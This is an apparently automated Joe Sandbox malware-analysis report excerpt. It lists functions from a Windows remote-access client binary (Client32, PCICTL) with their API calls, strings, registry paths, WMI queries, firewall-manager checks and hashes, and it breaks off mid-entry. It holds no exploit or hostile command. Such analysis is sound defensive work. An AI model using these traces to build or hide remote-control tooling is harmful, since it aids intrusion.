                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                        • API String ID: 3050498177-823534439
                                                                                        • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                        • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                        • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                        • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                        Function 11145440 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                          • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                        • _memset.LIBCMT ref: 11145485
                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                        • API String ID: 4251163631-545709139
                                                                                        • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                        • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                        • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                        • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                        Function 11015010 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 110150CA
                                                                                        • _memset.LIBCMT ref: 1101510E
                                                                                        • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                        Strings
                                                                                        • %012d, xrefs: 110150C4
                                                                                        • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                        • NSLSP, xrefs: 11015158
                                                                                        • PackedCatalogItem, xrefs: 11015132
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue_memsetwsprintf
                                                                                        • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                        • API String ID: 1333399081-1346142259
                                                                                        • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                        • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                        • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                        • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                        Function 1100FDC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 2427920155-3145022300
                                                                                        • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                        • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                        • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                        • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                        Function 11144BD0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                        • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                        • API String ID: 3494822531-1878648853
                                                                                        • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                        • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                        • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                        • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                        Function 11107290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                        • std::exception::exception.LIBCMT ref: 11107414
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                        • API String ID: 2851125068-2390547818
                                                                                        • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                        • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                        • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                        • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                        Function 11017300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(000002FC,000000FF), ref: 1101733C
                                                                                        • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                        • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                        • CoUninitialize.COMBASE ref: 110173D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                        • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                        • API String ID: 2407233060-578995875
                                                                                        • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                        • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                        • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                        • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                        Function 11017220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(000002FC,000000FF), ref: 11017252
                                                                                        • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                        • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                        • CoUninitialize.COMBASE ref: 110172E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                        • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                        • API String ID: 2407233060-2037925671
                                                                                        • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                        • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                        • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                        • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                        Function 111386B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                        • Client, xrefs: 11138705
                                                                                        • DoICFConfig() OK, xrefs: 11138786
                                                                                        • AutoICFConfig, xrefs: 11138700
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                        • API String ID: 536389180-1512301160
                                                                                        • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                        • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                        • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                        • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                        Function 11096970 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                        • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                        • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                        • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                        • API String ID: 3222248624-258972079
                                                                                        • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                        • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                        • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                        • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                        Function 11025D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                        • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                        • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
